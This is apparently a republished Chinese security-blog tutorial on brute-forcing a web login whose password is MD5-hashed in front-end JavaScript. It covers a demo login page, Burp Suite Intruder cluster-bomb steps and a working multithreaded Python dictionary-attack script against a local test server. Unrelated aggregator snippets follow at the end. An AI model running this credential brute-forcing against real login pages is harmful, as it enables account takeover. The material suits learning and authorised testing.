Web暴力破解--前端JS表单加密进行爆破-低调大师

Web暴力破解--前端JS表单加密进行爆破

2018-06-08 575

0x01 前言

　　常见的js实现加密的方式有：md5、base64、shal，写了一个简单的demo作为测试。

0x02 代码

login.html

<!DOCTYPE HTML>  
<html>  
<head>  
<meta charset="utf-8">  
<title>用户登录</title>  
<script type="text/ecmascript" src="md5.js"></script>
<script>
function checkInput() {
    var password_input = document.getElementById('password');
    var password_md5 = document.getElementById('password_md5');
    // set password
    password_md5.value =hex_md5(password_input.value);
    return true;
}
</script>
</head> 
<body>  
<form action="login.php" method="post" onsubmit="return checkInput()">
    用户：<input type="text" id="username" name="username"> <br/>
    密码：<input type="password" id="password"> <br/>
    <input type="hidden" id="password_md5" name="password">
    <input type="submit" value="提交" />
</form>
</body>  
</html>

提交表单，进行抓包，可以发现密码字段密码进行了加密处理：

0x03 Web暴力猜解

方式一：Burp Suite

　　使用Intruder进行暴力猜解，Intruder支持多种爆破模式、加密和编码支持。常见的md5、base64、shal加密方式，都可以用burpsuite直接处理。

　　四种爆破方式：单一字典爆破、多字段相同字典爆破、多字典位置对应爆破、聚合式爆破。

　　最常用的应该是在爆破用户名和密码的时候，使用聚合方式枚举了。

1、抓包发送到Intruder，标记相关参数，选择第四种模式“Cluster bomb”

2、分别选择用户名字典和密码字典，在设置密码字典的时候，选择md5加密方式对密码字段进行加密处理

3、开始进行爆破，根据返回字段长度判断是否成功，成功获取用户名和密码字段的MD5值 admin:21232f297a57a5a743894a0e4a801fc3

4、md5解密成功，获得用户名密码 admin/admin

方式二：Python脚本

　　这边采用Python ExecJs来执行Js语句模拟前端对账号密码进行加密

准备：

pip install PyExecJS

phantomjs下载：https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-2.1.1-windows.zip

编写Python脚本进行爆破：

#! /usr/bin/env python
# _*_  coding:utf-8 _*_

import requests
import threadpool
from selenium import webdriver
import execjs

def getpass(str):
    with open ('md5.js','r') as js:
        source = js.read()
        phantom = execjs.get('PhantomJS')
        getpass = phantom.compile(source)
        password = getpass.call('hex_md5',str)
        return password

def login(user,passwd):
    url="http://127.0.0.1/login.php"
    payload ={'username':user,'password':getpass(passwd)}
    headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}
    try:        
        response = requests.post(url,data=payload,headers=headers,timeout=5)
        result=response.content
        if result.count('fail')<1: 
            print '[success] ' +url+":"+user+':'+passwd

    except:
        pass
        
def getLines(fileName):
    list=[]
    with open(fileName, 'r') as fd:
        for line in fd.readlines():
            line = line.strip()
            if not len(line) or line.startswith('#'):
                continue
            list.append(line)
    return list

if __name__ == '__main__':    
    username_list=getLines('user.dict')
    password_list=getLines('pass.dict')

    userlist = [([user,passwd],None) for user in username_list for passwd in password_list]    
    
    pool = threadpool.ThreadPool(20)  
    reqs = threadpool.makeRequests(login,userlist)  
    [pool.putRequest(req) for req in reqs]  
    pool.wait()

成功爆破用户账号密码

0x04 END

　　从前台到后台是一个质的突破，本文主要对很多web 在登陆的过程中会用 js 对密码进行加密传输，梳理了一下web暴力猜解的技巧。

　　关于我：一个网络安全爱好者，致力于分享原创高质量干货，欢迎关注我的个人微信公众号：Bypass--，浏览更多精彩文章。

参考链接：

JS实现密码加密

http://www.cnblogs.com/mofish/archive/2012/02/25/2367858.html

js实现表单提交submit()，onsubmit

https://www.cnblogs.com/web-wjg/p/7894657.html

对登录中账号密码进行加密之后再传输的爆破的思路和方式

http://www.freebuf.com/articles/web/127888.html

微信关注我们

原文链接：https://yq.aliyun.com/articles/616731

转载内容版权归作者及来源网站所有！

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。

为什么Android官方废弃SoftRefrerence软引用和WeakReference弱引用，而拥抱LruCache？

为什么Android官方废弃SoftRefrerence软引用和WeakReference弱引用，而拥抱LruCache？一些具有Java背景的研发者喜欢使用软引用(SoftRefrerence)和弱引用(WeakReference)来缓存Java对象和数据，但是如果在Android中仍然使用软引用(SoftRefrerence)和弱引用(WeakReference)，会极易导致Android程序闪退崩溃，谷歌Android官方从Android 3.0以后，强烈建议开发者不要在Android中使用软引用(SoftRefrerence)和弱引用(WeakReference)，Android的谷歌官方解释（原文）： Note: In the past, a popular memory cache implementation was a SoftReference or WeakReference bitmap cache, however this is not recommended. Starting from Android 2.3 (API Level 9) the garb...

2018-06-09

685

并发包中并发List只有CopyOnWriteArrayList这一个，CopyOnWriteArrayList是一个线程安全的ArrayList,对其进行修改操作和元素迭代操作都是在底层创建一个拷贝数组（快照）上进行的，也就是写时拷贝策略。我们首先看一下CopyOnWriteArrayList的类图有哪些属性和方法，如下图所示：如上，CopyOnWriteArrayList的类图，每个CopyOnWriteArrayList对象里面有一个array数组对象用来存放具体元素，ReentrantLock独占锁对象用来保证同时只有一个线程对array进行修改，这里只要记得ReentrantLock是独占锁，同时只有一个线程可以获取就可以了。那么问题来了，如果让我们自己去做一个写时拷贝的线程安全的List，我们会怎么做，要考虑哪些要点？ 1.list何时初始化，初始化list元素个数为多少，list是有限大小？ 2.如何保证线程安全，比如多个线程进行读写时候，如果保证是线程安全的？ 3.如何使用迭代器遍历list时候的数据一致性？那么我们就进入CopyOnWriteArrayLis...

2018-06-09

526

资源下载

更多资源

优质分享App

近一个月的开发和优化，本站点的第一个app全新上线。该app采用极致压缩，本体才4.36MB。系统里面做了大量数据访问、缓存优化。方便用户在手机上查看文章。后续会推出HarmonyOS的适配版本。

Mario

马里奥是站在游戏界顶峰的超人气多面角色。马里奥靠吃蘑菇成长，特征是大鼻子、头戴帽子、身穿背带裤，还留着胡子。与他的双胞胎兄弟路易基一起，长年担任任天堂的招牌角色。

腾讯云软件源

为解决软件依赖安装时官方源访问速度慢的问题，腾讯云为一些软件搭建了缓存服务。您可以通过使用腾讯云软件源站来提升依赖包的安装速度。为了方便用户自由搭建服务架构，目前腾讯云软件源站支持公网访问和内网访问。

Nacos

Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service 的首字母简称，一个易于构建 AI Agent 应用的动态服务发现、配置管理和AI智能体管理平台。Nacos 致力于帮助您发现、配置和管理微服务及AI智能体应用。Nacos 提供了一组简单易用的特性集，帮助您快速实现动态服务发现、服务配置、服务元数据、流量管理。Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。